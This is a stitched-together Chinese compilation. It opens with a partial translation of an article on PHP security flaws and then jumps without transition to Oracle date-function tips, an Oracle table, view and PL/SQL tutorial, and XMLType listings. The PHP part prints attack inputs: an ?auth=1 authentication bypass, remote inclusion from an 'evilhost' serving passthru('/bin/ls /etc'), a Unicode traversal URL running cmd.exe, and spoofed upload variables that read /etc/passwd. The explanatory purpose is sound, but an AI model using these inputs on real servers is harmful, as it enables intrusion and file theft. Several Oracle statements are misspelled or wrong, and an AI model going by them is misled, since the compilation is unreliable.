来源:Chinaasp

之所以翻译这篇文章，是因为目前关于CGI安全性的文章都是拿Perl作为例子，而专门介绍ASP，PHP或者JSP安全性的文章则很少。Shaun Clowes的这篇文章比较全面地介绍了PHP的安全问题，原文可以在http://www.securereality.com.au/studyinscarlet.txt找到。 由于原文比较长，而且有相当一部分是介绍文章的背景或PHP的基础知识，没有涉及到PHP安全方面的内容，因此我没有翻译。如果你想了解这方面的知识，请参考原文。 文章主要从全局变量，远程文件，文件上载，库文件，Session文件，数据类型和容易出错的函数这几个方面分析了PHP的安全性，并且对如何增强PHP的安全性提出了一些有用的建议。 好了，废话少说，我们言归正传！ [全局变量] PHP中的变量不需要事先声明，它们会在第一次使用时自动创建，它们的类型也不需要指定，它们会根据上下文环境自动确定。从程序员的角度来看，这无疑是一种极其方便的处理方法。很显然，这也是快速开发语言的一个很有用的特点。一旦一个变量被创建了，就可以在程序中的任何地方使用。这个特点导致的结果就是程序员很少初始化变量，毕竟，当它们第一次创建时，他们是空的。 很显然，基于PHP的应用程序的主函数一般都是接受用户的输入（主要是表单变量，上载文件和Cookie等），然后对输入数据进行处理，然后把结果返回到客户端浏览器。为了使PHP代码访问用户的输入尽可能容易，实际上PHP是把这些输入数据看作全局变量来处理的。 例如： <FORM METHOD=”GET” ACTION=”test.php”> <INPUT TYPE=”TEXT” NAME=”hello”> <INPUT TYPE=”SUBMIT”> </FORM> 很显然，这会显示一个文本框和提交按钮。当用户点击提交按钮时，“test.php”会处理用户的输入，当“test.php”运行时，“$hello”会包含用户在文本框输入的数据。从这里我们应该看出，攻击者可以按照自己的意愿创建任意的全局变量。如果攻击者不是通过表单输入来调用“test.php”，而是直接在浏览器地址栏输入http://server/test.php?hello=hi&setup=no，那么，不止是“$hello”被创建，“$setup”也被创建了。 译者注：这两种方法也就是我们通常说的“POST”和“GET”方法。 下面的用户认证代码暴露了PHP的全局变量所导致的安全问题： <?php if ($pass == “hello”) $auth = 1; … if ($auth == 1) echo “some important information”; ?> 上面的代码首先检查用户的密码是否为“hello”，如果匹配的话，设置“$auth”为“1”，即通过认证。之后如果“$suth”为“1”的话，就会显示一些重要信息。 表面看起来是正确的，而且我们中有相当一部分人是这样做的，但是这段代码犯了想当然的错误，它假定“$auth”在没有设置值的时候是空的，却没有想到攻击者可以创建任何全局变量并赋值，通过类似“http://server/test.php?auth=1”的方法，我们完全可以欺骗这段代码，使它相信我们是已经认证过的。 因此，为了提高PHP程序的安全性，我们不能相信任何没有明确定义的变量。如果程序中的变量很多的话，这可是一项非常艰巨的任务。 一种常用的保护方式就是检查数组HTTP_GET[]或POST_VARS[]中的变量，这依赖于我们的提交方式（GET或POST）。当PHP配置为打开“track_vars”选项的话（这是缺省值），用户提交的变量就可以在全局变量和上面提到的数组中获得。 但是值得说明的是，PHP有四个不同的数组变量用来处理用户的输入。HTTP_GET_VARS数组用来处理GET方式提交的变量，HTTP_POST_VARS数组用于处理POST方式提交的变量，HTTP_COOKIE_VARS数组用于处理作为cookie头提交的变量，而对于HTTP_POST_FILES数组（比较新的PHP才提供），则完全是用户用来提交变量的一种可选方式。用户的一个请求可以很容易的把变量存在这四个数组中，因此一个安全的PHP程序应该检查这四个数组。 [远程文件] PHP是一种具有丰富特性的语言，提供了大量的函数，使编程者实现某个功能很容易。但是从安全的角度来看，功能越多，要保证它的安全性就越难，远程文件就是说明这个问题的一个很好的例子： <?php if (!($fd = fopen(“$filename”, “r”)) echo(“Could not open file: $filename<BR>n”); ?> 上面的脚本试图打开文件“$filename”，如果失败就显示错误信息。很明显，如果我们能够指定“$filename”的话，就能利用这个脚本浏览系统中的任何文件。但是，这个脚本还存在一个不太明显的特性，那就是它可以从任何其它WEB或FTP站点读取文件。实际上，PHP的大多数文件处理函数对远程文件的处理是透明的。 例如： 如果指定“$filename”为“http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir” 则上面的代码实际上是利用主机target上的unicode漏洞，执行了dir命令。 这使得支持远程文件的include()，require()，include_once()和require_once()在上下文环境中变得更有趣。这些函数主要功能是包含指定文件的内容，并且把它们按照PHP代码解释，主要是用在库文件上。 例如： <?php include($libdir . “/languages.php”); ?> 上例中“$libdir”一般是一个在执行代码前已经设置好的路径，如果攻击者能够使得“$libdir”没有被设置的话，那么他就可以改变这个路径。但是攻击者并不能做任何事情，因为他们只能在他们指定的路径中访问文件languages.php（perl中的“Poison null byte”攻击对PHP没有作用）。但是由于有了对远程文件的支持，攻击者就可以做任何事情。例如，攻击者可以在某台服务器上放一个文件languages.php，包含如下内容： <?php passthru(“/bin/ls /etc”); ?> 然后把“$libdir”设置为“http://<evilhost>/”，这样我们就可以在目标主机上执行上面的攻击代码，“/etc”目录的内容作为结果返回到客户的浏览器中。 需要注意的是，攻击服务器（也就是evilhost）应该不能执行PHP代码，否则攻击代码会在攻击服务器，而不是目标服务器执行，如果你想了解具体的技术细节，请参考：http://www.securereality.com.au/sradv00006.txt [文件上载] PHP自动支持基于RFC 1867的文件上载，我们看下面的例子： <FORM METHOD=”POST” ENCTYPE=”multipart/form-data”> <INPUT TYPE=”FILE” NAME=”hello”> <INPUT TYPE=”HIDDEN” NAME=”MAX_FILE_SIZE” VALUE=”10240″> <INPUT TYPE=”SUBMIT”> </FORM> 上面的代码让用户从本地机器选择一个文件，当点击提交后，文件就会被上载到服务器。这显然是很有用的功能，但是PHP的响应方式使这项功能变的不安全。当PHP第一次接到这种请求，甚至在它开始解析被调用的PHP代码之前，它会先接受远程用户的文件，检查文件的长度是否超过“$MAX_FILE_SIZE variable”定义的值，如果通过这些测试的话，文件就会被存在本地的一个临时目录中。 因此，攻击者可以发送任意文件给运行PHP的主机，在PHP程序还没有决定是否接受文件上载时，文件已经被存在服务器上了。 这里我就不讨论利用文件上载来对服务器进行DOS攻击的可能性了。 让我们考虑一下处理文件上载的PHP程序，正如我们上面说的，文件被接收并且存在服务器上（位置是在配置文件中指定的，一般是/tmp），扩展名一般是随机的，类似“phpxXuoXG”的形式。PHP程序需要上载文件的信息以便处理它，这可以通过两种方式，一种方式是在PHP 3中已经使用的，另一种是在我们对以前的方法提出安全公告后引入的。 但是，我们可以肯定的说，问题还是存在的，大多数PHP程序还是使用老的方式来处理上载文件。PHP设置了四个全局变量来描述上载文件，比如说上面的例子： $hello = Filename on local machine (e.g “/tmp/phpxXuoXG”) $hello_size = Size in bytes of file (e.g 1024) $hello_name = The original name of the file on the remote system (e.g “c:\temp\hello.txt”) $hello_type = Mime type of uploaded file (e.g “text/plain”) 然后PHP程序开始处理根据“$hello”指定的文件，问题在于“$hello”不一定是一个PHP设置的变量，任何远程用户都可以指定它。如果我们使用下面的方式： http://vulnhost/vuln.php?hello=/etc/passwd&hello_size=10240&hello_type=text/plain&hello_name=hello.txt 就导致了下面的PHP全局变量（当然POST方式也可以（甚至是Cookie））： $hello = “/etc/passwd” $hello_size = 10240 $hello_type = “text/plain” $hello_name = “hello.txt” 上面的表单数据正好满足了PHP程序所期望的变量，但是这时PHP程序不再处理上载的文件，而是处理“/etc/passwd”（通常会导致内容暴露）。这种攻击可以用于暴露任何敏感文件的内容。 我在前面已经说了，新版本的PHP使用HTTP_POST_FILES[]来决定上载文件，同时也提供了很多函数来解决这个问题，例如有一个函数用来判断某个文件是不是实际上载的文件。这些函数很好的解决了这个问题，但是实际上肯定有很多PHP程序仍然使用旧的方法，很容易受到这种攻击。 作为文件上载的攻击方法的一个变种，我们看一下下面的一段代码： <?php if (file_exists($theme)) // Checks the file exists on the local system (no remote files) include(“$theme”); ?> 如果攻击者可以控制“$theme”的话，很显然它可以利用“$theme”来读取远程系统上的任何文件。攻击者的最终目标是在远程服务器上执行任意指令，但是他无法使用远程文件，因此，他必须得在远程服务器上创建一个PHP文件。这乍看起来好象是不可能的，但是文件上载帮了我们这个忙，如果攻击者先在本地机器上创建一个包含PHP代码的文件，然后创建一个包含名为“theme”的文件域的表单，最后用这个表单通过文件上载把创建的包含PHP代码的文件提交给上面的代码，PHP就会把攻击者提交的文件保存起来，并把“$theme”的值设置为攻击者提交的文件，这样file_exists()函数会检查通过，攻击者的代码也将执行。 获得执行任意指令的能力之后，攻击者显然想提升权限或者是扩大战果，而这又需要一些服务器上没有的工具集，而文件上载又一次帮了我们这个忙。攻击者可以使用文件上载功能上载工具，把她们存在服务器上，然后利用他们执行指令的能力，使用chmod()改变文件的权限，然后执行。例如：攻击者可以绕过防火墙或IDS上载一个本地root攻击程序，然后执行，这样就获得了root权限。

>

日期处理完全版
TO_DATE格式
Day:
dd number 12
dy abbreviated fri
day spelled out friday
ddspth spelled out, ordinal twelfth
Month:
mm number 03
mon abbreviated mar
month spelled out march
Year:
yy two digits 98
yyyy four digits 1998

24小时格式下时间范围为： 0:00:00 – 23:59:59….
12小时格式下时间范围为： 1:00:00 – 12:59:59 ….
1.
日期和字符转换函数用法（to_date,to_char）

2.
select to_char( to_date(222,’J'),’Jsp’) from dual

显示Two Hundred Twenty-Two

3.
求某天是星期几
select to_char(to_date(‘2002-08-26′,’yyyy-mm-dd’),’day’) from dual;
星期一
select to_char(to_date(‘2002-08-26′,’yyyy-mm-dd’),’day’,'NLS_DATE_LANGUAGE = American’) from dual;
monday
设置日期语言
ALTER SESSION SET NLS_DATE_LANGUAGE=’AMERICAN’;
也可以这样
TO_DATE (‘2002-08-26′, ‘YYYY-mm-dd’, ‘NLS_DATE_LANGUAGE = American’)

4.
两个日期间的天数
select floor(sysdate – to_date(‘20020405′,’yyyymmdd’)) from dual;

5. 时间为null的用法
select id, active_date from table1
UNION
select 1, TO_DATE(null) from dual;

注意要用TO_DATE(null)

6.
a_date between to_date(‘20011201′,’yyyymmdd’) and to_date(‘20011231′,’yyyymmdd’)
那么12月31号中午12点之后和12月1号的12点之前是不包含在这个范围之内的。
所以，当时间需要精确的时候，觉得to_char还是必要的
7. 日期格式冲突问题
输入的格式要看你安装的ORACLE字符集的类型, 比如: US7ASCII, date格式的类型就是: ‘01-Jan-01′
alter system set NLS_DATE_LANGUAGE = American
alter session set NLS_DATE_LANGUAGE = American
或者在to_date中写
select to_char(to_date(‘2002-08-26′,’yyyy-mm-dd’),’day’,'NLS_DATE_LANGUAGE = American’) from dual;
注意我这只是举了NLS_DATE_LANGUAGE，当然还有很多，
可查看
select * from nls_session_parameters
select * from V$NLS_PARAMETERS

8.
select count(*)
from ( select rownum-1 rnum
from all_objects
where rownum <= to_date(‘2002-02-28′,’yyyy-mm-dd’) – to_date(‘2002-
02-01′,’yyyy-mm-dd’)+1
)
where to_char( to_date(‘2002-02-01′,’yyyy-mm-dd’)+rnum-1, ‘D’ )
not
in ( ‘1′, ‘7′ )

查找2002-02-28至2002-02-01间除星期一和七的天数
在前后分别调用DBMS_UTILITY.GET_TIME, 让后将结果相减(得到的是1/100秒, 而不是毫秒).

9.
select months_between(to_date(‘01-31-1999′,’MM-DD-YYYY’),
to_date(‘12-31-1998′,’MM-DD-YYYY’)) “MONTHS” FROM DUAL;
1

select months_between(to_date(‘02-01-1999′,’MM-DD-YYYY’),
to_date(‘12-31-1998′,’MM-DD-YYYY’)) “MONTHS” FROM DUAL;

1.03225806451613
10. Next_day的用法
Next_day(date, day)

Monday-Sunday, for format code DAY
Mon-Sun, for format code DY
1-7, for format code D

11
select to_char(sysdate,’hh:mi:ss’) TIME from all_objects
注意：第一条记录的TIME 与最后一行是一样的
可以建立一个函数来处理这个问题
create or replace function sys_date return date is
begin
return sysdate;
end;

select to_char(sys_date,’hh:mi:ss’) from all_objects;
12.
获得小时数

SELECT EXTRACT(HOUR FROM TIMESTAMP ‘2001-02-16 2:38:40′) from offer
SQL> select sysdate ,to_char(sysdate,’hh’) from dual;

SYSDATE TO_CHAR(SYSDATE,’HH’)
——————– ———————
2003-10-13 19:35:21 07

SQL> select sysdate ,to_char(sysdate,’hh24′) from dual;

SYSDATE TO_CHAR(SYSDATE,’HH24′)
——————– ———————–
2003-10-13 19:35:21 19

获取年月日与此类似
13.
年月日的处理
select older_date,
newer_date,
years,
months,
abs(
trunc(
newer_date-
add_months( older_date,years*12+months )
)
) days
from ( select
trunc(months_between( newer_date, older_date )/12) YEARS,
mod(trunc(months_between( newer_date, older_date )),
12 ) MONTHS,
newer_date,
older_date
from ( select hiredate older_date,
add_months(hiredate,rownum)+rownum newer_date
from emp )
)

14.
处理月份天数不定的办法
select to_char(add_months(last_day(sysdate) +1, -2), ‘yyyymmdd’),last_day(sysdate) from dual

16.
找出今年的天数
select add_months(trunc(sysdate,’year’), 12) – trunc(sysdate,’year’) from dual

闰年的处理方法
to_char( last_day( to_date(‘02′ || :year,’mmyyyy’) ), ‘dd’ )
如果是28就不是闰年

17.
yyyy与rrrr的区别
‘YYYY99 TO_C
——- —-
yyyy 99 0099
rrrr 99 1999
yyyy 01 0001
rrrr 01 2001

18.不同时区的处理
select to_char( NEW_TIME( sysdate, ‘GMT’,'EST’), ‘dd/mm/yyyy hh:mi:ss’) ,sysdate
from dual;

19.
5秒钟一个间隔
Select TO_DATE(FLOOR(TO_CHAR(sysdate,’SSSSS’)/300) * 300,’SSSSS’) ,TO_CHAR(sysdate,’SSSSS’)
from dual

2002-11-1 9:55:00 35786
SSSSS表示5位秒数

20.
一年的第几天
select TO_CHAR(SYSDATE,’DDD’),sysdate from dual
310 2002-11-6 10:03:51

21.计算小时,分,秒,毫秒
select
Days,
A,
TRUNC(A*24) Hours,
TRUNC(A*24*60 – 60*TRUNC(A*24)) Minutes,
TRUNC(A*24*60*60 – 60*TRUNC(A*24*60)) Seconds,
TRUNC(A*24*60*60*100 – 100*TRUNC(A*24*60*60)) mSeconds
from
(
select
trunc(sysdate) Days,
sysdate – trunc(sysdate) A
from dual
)

select * from tabname
order by decode(mode,’FIFO’,1,-1)*to_char(rq,’yyyymmddhh24miss’);

//
floor((date2-date1) /365) 作为年
floor((date2-date1, 365) /30) 作为月
mod(mod(date2-date1, 365), 30)作为日.
23.next_day函数
next_day(sysdate,6)是从当前开始下一个星期五。后面的数字是从星期日开始算起。
1 2 3 4 5 6 7
日 一 二 三 四 五 六

Oracle数据库数据对象中最基本的是表和视图，其他还有约束、序列、函数、存储过程、包、触发器等。对数据库的操作可以基本归结为对数据对象的操作,理解和掌握Oracle数据库对象是学习Oracle的捷径。

表和视图

Oracle中表是数据存储的基本结构。ORACLE8引入了分区表和对象表，ORACLE8i引入了临时表，使表的功能更强大。视图是一个或多个表中数据的逻辑表达式。本文我们将讨论怎样创建和管理简单的表和视图。

管理表

表可以看作有行和列的电子数据表，表是关系数据库中一种拥有数据的结构。用CREATE TABLE语句建立表，在建立表的同时，必须定义表名，列，以及列的数据类型和大小。例如：

CREATE TABLE products ( PROD_ID NUMBER(4), PROD_NAME VAECHAR2(20), STOCK_QTY NUMBER(5,3) ); 

这样我们就建立了一个名为products的表， 关键词CREATE TABLE后紧跟的表名，然后定义了三列，同时规定了列的数据类型和大小。

在创建表的同时你可以规定表的完整性约束，也可以规定列的完整性约束，在列上普通的约束是NOT NULL,关于约束的讨论我们在以后进行。

在建立或更改表时，可以给表一个缺省值。缺省值是在增加行时，增加的数据行中某一项值为null时，oracle即认为该值为缺省值。

下列数据字典视图提供表和表的列的信息：

　　　. DBA_TABLES
　　　. DBA_ALL_TABLES
　　　. USER_TABLES
　　　. USER_ALL_TABLES
　　　. ALL_TABLES
　　　. ALL_ALL_TABLES
　　　. DBA_TAB_COLUMNS
　　　. USER_TAB_COLUMNS
　　　. ALL_TAB_COLUMNS

表的命名规则

表名标识一个表，所以应尽可能在表名中描述表，oracle中表名或列名最长可以达30个字符串。表名应该以字母开始，可以在表名中包含数字、下划线、#、$等。

从其它表中建立表

可以使用查询从基于一个或多个表中建立表，表的列的数据类型和大小有查询结果决定。建立这种形式的表的查询可以选择其他表中所有的列或者只选择部分列。在CREATE TABLE语句中使用关键字AS，例如:

SQL> CREATE TABLE emp AS SELECT * FROM employee SQL> CREATE TABLE Y AS SELECT * FROM X WHERE no=2 

需要注意的是如果查询涉及LONG数据类型，那么CREATE TABLE….AS SELECT….将不会工作。

更改表定义

在建立表后，有时候我们可能需要修改表，比如更改列的定义，更改缺省值，增加新列，删除列等等。ORACLE使用ALTER TABLE语句来更改表的定义

1、增加列

语法：ALTER TABLE [schema.] table_name ADD column_definition

例：

ALTER TABLE orders ADD order_date DATE;

对于已经存在的数据行，新列的值将是NULL.

2、更改列

语法： ALTER TABLE [schema.] table_name MODIFY column_name new_attributes;

例：

ALTER TABLE orders MODITY (quantity number(10,3),status varchar2(15)); 

这个例子中我们修改了表orders，将STATUS列的长度增加到15,将QUANTITY列减小到10,3;

修改列的规则如下：
　　　. 可以增加字符串数据类型的列的长度，数字数据类型列的精度。
　　　. 减少列的长度时，该列应该不包含任何值，所有数据行都为NULL.
　　　. 改变数据类型时，该列的值必须是NULL.
　　　. 对于十进制数字，可以增加或减少但不能降低他的精度。

3、删除数据列

优化ORACLE数据库，唯一的方法是删除列，重新建立数据库。在ORACLE8i中有很多方法删除列，你可以删除未用数据列或者可以标示该列为未用数据列然后删除。

语法：ALTER TABLE [schema.] table_name DROP {COLUM column_names | (column_names)}[CASCADE CONSTRAINS]

要注意的是在删除列时关于该列的索引和完整性约束也同时删除。注意关键字CASCADE CONSTRAINS，如果删除的列是多列约束的一部分，那么这个约束条件相对于其他列也同时删除。

如果用户担心在大型数据库中删除列要花太多时间，可以先将他们标记为未用数据列，标记未用数据列的语法如下：

ALTER TABLE [schema.] table_name SET UNUSED {COLUM column_names | (column_names)}[CASCADE CONSTRAINS]

这个语句将一个或多个数据列标记为未用数据列，但并不删除数据列中的数据，也不释放占用的磁盘空间。但是，未用数据列在视图和数据字典中并不显示，并且该数据列的名称将被删除，新的数据列可以使用这个名称。基于该数据列的索引、约束，统计等都将被删除。

删除未用数据列的语句是：

ALTER TABLE [schema.] table_name DROP {UNUSED COLUM | COLUMN CONTINUE}

删除表和更改表名

删除表非常简单，但它是一个不可逆转的行为。

语法： DROP TABLE [schema.] table_name [CASCADE CONSTRAINTS]

删除表后，表上的索引、触发器、权限、完整性约束也同时删除。ORACLE不能删除视图，或其他程序单元，但oracle将标示他们无效。如果删除的表涉及引用主键或唯一关键字的完整性约束时，那么DROP TABLE语句就必须包含CASCADE CONSTRAINTS子串。

更改表名

RENAME命令用于给表和其他数据库对象改名。ORACLE系统自动将基于旧表的完整性约束、索引、权限转移到新表中。ORACLE同时使所有基于旧表的数据库对象，比如视图、程序、函数等，为不合法。

语法：RENAME old_name TO new_name;

例：

SQL> RENAME orders TO purchase_orders;

截短表

TRUNCATE命令与DROP命令相似， 但他不是删除整个数据表，所以索引、完整性约束、触发器、权限等都不会被删除。缺省情况下将释放部分表和视图空间，如果用户不希望释放表空间，TRUNCATE语句中要包含REUSE STORAGE子串。TRUNCATE命令语法如下：

TRUNCATE {TABLE|CLUSTER} [schema.] name {DROP|REUSE STORAGE}

例：

 SQL> TRUNCATE TABLE t1; 

管理视图

视图是一个或多个表中的数据的简化描述，用户可以将视图看成一个存储查询（stored query)或一个虚拟表(virtual table).查询仅仅存储在oracle数据字典中，实际的数据没有存放在任何其它地方，所以建立视图不用消耗其他的空间。视图也可以隐藏复杂查询，比如多表查询，但用户只能看见视图。视图可以有与他所基于表的列名不同的列名。用户可以建立限制其他用户访问的视图。

建立视图

CREATE VIEW命令创建视图，定义视图的查询可以建立在一个或多个表，或其他视图上。查询不能有FOR UPDATE子串，在早期的ORACLE8i版本中不支持ORDER BY子串，现在的版本中CREATE VIEW可以拥有ORDER BY子串。

例：

SQL> CREATE VIEW TOP_EMP AS SELECT empno EMPLOYEE_ID,ename EMPLOYEE_NAME,salary FROM emp WHERE salary > 2000 

用户可以在创建视图的同时更改列名，方法是在视图名后立即加上要命名的列名。重新定义视图需要包含OR REPLACE子串。

SQL> CREATE VIEW TOP_EMP(EMPLOYEE_ID，EMPLOYEE_NAME，SALARY) AS SELECT empno ,ename ,salary FROM emp WHERE salary >2000 

如果在创建的视图包含错误在正常情况下，视图将不会被创建。但如果你需要创建一个带错误的视图必须在CREATE VIEW语句中带上FORCE选项。如：

CREATE FORCE VIEW ORDER_STATUS AS SELECT * FROM PURCHASE_ORDERS WHERE STATUS="APPPOVE"; SQL>/ warning :View create with compilation errors 

这样将创建了一个名为ORDER_STATUS的视图，但这样的视图的状态是不合法的，如果以后状态发生变化则可以重新编译，其状态也变成合法的。

从视图中获得数据

从视图中获得数据与从表中获得数据基本一样，用户可以在连接和子查询中使用视图，也可以使用SQL函数，以及所有SELECT语句的字串。

插入、更新、删除数据

用户在一定的限制条件下可以通过视图更新、插入、删除数据。如果视图连接多个表，那么在一个时间里只能更新一个表。所有的能被更新的列可以在数据字典USER_UPDATETABLE_COLUMNS中查到。

用户在CREATE VIEW中可以使用了WITH子串。WITH READ ONLY子串表示创建的视图是一个只读视图，不能进行更新、插入、删除操作。WITH CHECK OPTION表示可以进行插入和更新操作，但应该满足WHERE子串的条件。这个条件就是创建视图WHERE子句的条件，比如在上面的例子中用户创建了一个视图TOP_EMP,在这个视图中用户不能插入salary小于2000的数据行。

删除视图

删除视图使用DROP VIEW命令。同时将视图定义从数据字典中删除，基于视图的权限也同时被删除，其他涉及到该视图的函数、视图、程序等都将被视为非法。

例：

DROP VIEW TOP_EMP; 

过程和函数

过程和函数都以编译后的形式存放在数据库中，函数可以没有参数也可以有多个参数并有一个返回值。过程有零个或多个参数，没有返回值。函数和过程都可以通过参数列表接收或返回零个或多个值，函数和过程的主要区别不在于返回值，而在于他们的调用方式。过程是作为一个独立执行语句调用的：

 pay_involume(invoice_nbr,30,due_date);

函数以合法的表达式的方式调用：

order_volumn:=open_orders(SYSDATE,30);

创建过程的语法如下：

CREATE [ OR REPLACE] PROCEDURE [schema.]procedure_name
[parameter_lister]
{AS|IS}
declaration_section
BEGIN
executable_section
[EXCEPTION
exception_section]
END [procedure_name]  

每个参数的语法如下：

paramter_name mode datatype [(:=|DEFAULT) value]

mode有三种形式：IN、OUT、INOUT。

IN表示在调用过程的时候，实际参数的取值被传递给该过程，形式参数被认为是只读的，当过程结束时，控制会返回控制环境，实际参数的值不会改变。

OUT在调用过程时实际参数的取值都将被忽略，在过程内部形式参数只能是被赋值，而不能从中读取数据，在过程结束后形式参数的内容将被赋予实际参数。

INOUT这种模式是IN和OUT的组合；在过程内部实际参数的值会传递给形式参数，形势参数的值可读也可写，过程结束后，形势参数的值将赋予实际参数。

创建函数的语法和过程的语法基本相同，唯一的区别在于函数有RETUREN子句

CREATE [ OR REPLACE] FINCTION [schema.]function_name
[parameter_list]
RETURN returning_datatype
{AS|IS}
declaration_section
BEGIN
executable_section
[EXCEPTION]
exception_section
END [procedure_name]  

在执行部分函数必须有哟个或多个return语句。

在创建函数中可以调用单行函数和组函数，例如：

CREATE OR REPLACE FUNCTION my_sin(DegreesIn IN NUMBER) RETURN NUMBER IS pi NUMBER=ACOS(-1); RadiansPerDegree NUMBER; BEGIN RadiansPerDegree=pi/180; RETURN(SIN(DegreesIn*RadiansPerDegree)); END; 

包

包是一种将过程、函数和数据结构捆绑在一起的容器；包由两个部分组成：外部可视包规范，包括函数头，过程头，和外部可视数据结构；另一部分是包主体(package body),包主体包含了所有被捆绑的过程和函数的声明、执行、异常处理部分。

打包的PL/SQL程序和没有打包的有很大的差异，包数据在用户的整个会话期间都一直存在，当用户获得包的执行授权时，就等于获得包规范中的所有程序和数据结构的权限。但不能只对包中的某一个函数或过程进行授权。包可以重载过程和函数，在包内可以用同一个名字声明多个程序，在运行时根据参数的数目和数据类型调用正确的程序。

创建包必须首先创建包规范，创建包规范的语法如下：

CREATE [OR REPLACE] PACKAGE package_name
{AS|IS}
public_variable_declarations |
public_type_declarations |
public_exception_declarations |
public_cursor_declarations |
function_declarations |
procedure_specifications
END [package_name]

创建包主体使用CREATE PACKAGE BODY语句：

CREATE [OR REPLACE] PACKAGE BODY package_name
{AS|IS}
private_variable_declarations |
private_type_declarations |
private_exception_declarations |
private_cursor_declarations |
function_declarations |
procedure_specifications
END [package_name]

私有数据结构是那些在包主体内部，对被调用程序而言是不可见的。

触发器(Triggers)

触发器是一种自动执行响应数据库变化的程序。可以设置为在触发器事件之前或之后触发或执行。能够触发触发器事件的事件包括下面几种：

DML事件
DDL事件
数据库事件

创建触发器的语法如下：

CREATE [OR REPLACE] TRIGGER trigger_name
{before|after|instead of} event
ON {table_or_view_name|DATABASE}
[FOR EACH ROW[WHEN condition>
trigger_body

只有DML触发器（INSERT、UPDATE、DELETE)语句可以使用INSTEAD OF触发器并且只有表的DML触发器可以是BEFORE或AFTER触发器。

象约束一样触发器可以被设置为禁用或启用来关闭或打开他们的执行体(EXECUTE),将触发器设置为禁用或启用使用ALTER TRIGGER语句：

ALTER TRIGGER trigger_name ENABLE;
ALTER TRIGGER trigger_name DISABLE;

要禁用或启用表的所有触发器，使用ALTER TABLE语句

ALTER TRIGGER table_name DISABLE ALL TRIGGER;
ALTER TRIGGER table_name ENABLE ALL TRIGGER;

删除触发器使用DROP TRIGGER

DROP TRIGGER trigger_name;

数据字典

Oracle数据字典包含了用户数据库的元数据。带下划线的表名称中带OBJ$、UET$、SOURCE$，这些表是在执行CREATE DATABASE语句期间由sql.bsq脚本创建的，一般情况下用户很少访问这些表。脚本catalog.sql（通常位于$oracle_home/rdbms/admin）在CREATE DATABASE语句之后立即运行，创建数据字典视图。

数据字典视图大致可以分为三类：

　　.前缀为USER_的数据字典视图，包含了用户拥有的对象的信息。
　　.前缀为ALL_的数据字典视图，包含了用户当前可以访问的全部对象和权限的信息。
　　.前缀为DBA_的数据字典视图，包含了数据库拥有的所有对象和权限的信息。

在绝大多数数据字典视图中都有象DBA_TABLES,ALL_TABLES和USER_TABLES这样的视图家族。Oracle中有超过100个视图家族，所以要全面介绍这些视图家族是单调乏味的而且没有多大的意义。在下表中列出了最重要和最常用的视图家族，需要注意的是每个视图家族都有一个DBA_,一个ALL_一个USER_视图。
其他的字典视图中主要的是V$视图，之所以这样叫是因为他们都是以V$或GV$开头的。V$视图是基于X$虚拟视图的。V$视图是SYS用户所拥有的，在缺省状况下，只有SYS用户和拥有DBA系统权限的用户可以看到所有的视图，没有DBA权限的用户可以看到USER_和ALL_视图，但不能看到DBA_视图。与DBA_,ALL,和USER_视图中面向数据库信息相反，这些视图可视的给出了面向实例的信息。

在大型系统上化几周时间手工输入每一条语句
手工输入带用户名变量的语句，然后再输入每一个用户名，这需要花好几个小时的时间
写一条SQL语句，生成需要的ALTER USER语句，然后执行他，这只需要几分钟时间

很明显我们将选择生成SQL的方法：

例：

SELECT "ALTER USER"||username||"TEMPORARY TABLESPACE temp;" FROM DBA_USERS WHERE username<>"SYS" AND temporary_tablespace<>"TEMP"; 

这个查询的结果将被脱机处理到一个文件中，然后在执行：

ALTER USER SYSTEM TEMPORARY TABLESPACE temp; ALTER USER OUTLN TEMPORARY TABLESPACE temp; ALTER USER DBSNMP TEMPORARY TABLESPACE temp; ALTER USER SCOTT TEMPORARY TABLESPACE temp; ALTER USER DEMO TEMPORARY TABLESPACE temp;

http://oracle.com/global/cn/oramag/oracle/01-nov/index.html?o61xml.html

http://otn.oracle.com/oramag/oracle/01-nov/o61xml.html

LISTING 1: CREATING A TABLE BY USING XMLTYPE

 SQL> create table PURCHASEORDER (PODOCUMENT sys.XMLTYPE); Table created. SQL> insert into PURCHASEORDER (PODOCUMENT) values ( 2 sys.XMLTYPE.createXML( 3 ' 4 <PurchaseOrder> 5 <Reference>BLAKE-2001062514034298PDT</Reference> 6 <Actions> 7 <Action> 8 <User>KING</User> 9 <Date/> 10 </Action> 11 </Actions> 12 <Reject/> 13 <Requester>David E. Blake</Requester> 14 <User>BLAKE</User> 15 <CostCenter>S30</CostCenter> 16 <ShippingInstructions> 17 <name>David E. Blake</name> 18 <address>400 Oracle Parkway Redwood Shores, CA, 94065 USA</address> 19 <telephone>650 999 9999</telephone> 20 </ShippingInstructions> 21 <SpecialInstructions>Air Mail</SpecialInstructions> 22 <LineItems> 23 <LineItem ItemNumber="1"> 24 <Description>The Birth of a Nation</Description> 25 <Part Id="EE888" UnitPrice="65.39" Quantity="31"/> 26 </LineItem> 27 </LineItems> 28 </PurchaseOrder> 29 ')); 1 row created.
LISTING 2: QUERYING AN XMLTYPE TABLE
 SQL> set long 10000 SQL> select p.podocument.getClobVal() from purchaseorder p; P.PODOCUMENT.GETCLOBVAL() ---------------------------------- <PurchaseOrder> <Reference>BLAKE-2001062514034298PDT</Reference> <Actions> <Action> <User>KING</User> <Date/> </Action> </Actions> <Reject/> <Requester>David E. Blake</Requester> <User>BLAKE</User> <CostCenter>S30</CostCenter> <ShippingInstructions> <name>David E. Blake</name> <address>400 Oracle Parkway Redwood Shores, CA, 94065 USA</address> <telephone>650 999 9999</telephone> </ShippingInstructions> <SpecialInstructions>Air Mail</SpecialInstructions> <LineItems> <LineItem ItemNumber="1"> <Description>The Birth of a Nation</Description> <Part Id="EE888" UnitPrice="65.39" Quantity="31"/> </LineItem> </LineItems> </PurchaseOrder>
LISTING 3: USING THE EXTRACT FUNCTION
 SQL> select P.PODOCUMENT.extract('/PurchaseOrder/ShippingInstructions').getClobVal() 2 from PURCHASEORDER P 3 where P.PODOCUMENT.extract('/PurchaseOrder/Reference/text()').getStringVal() = 4 'BLAKE-2001062514034298PDT' 5 / P.PODOCUMENT.EXTRACT('/PURCHASEORDER/SHIPPINGINSTRUCTIONS').GETCLOBVAL() ---------------------------------------- <ShippingInstructions> <name>David E. Blake</name> <address>400 Oracle Parkway Redwood Shores, CA, 94065 USA</address> <telephone>650 999 9999</telephone> </ShippingInstructions> 

http://docs.sun.com/db/doc/816-3981/6ma7nhfe9?l=zh&a=view

Unicode 语言环境：en_US.UTF-8 支持概述

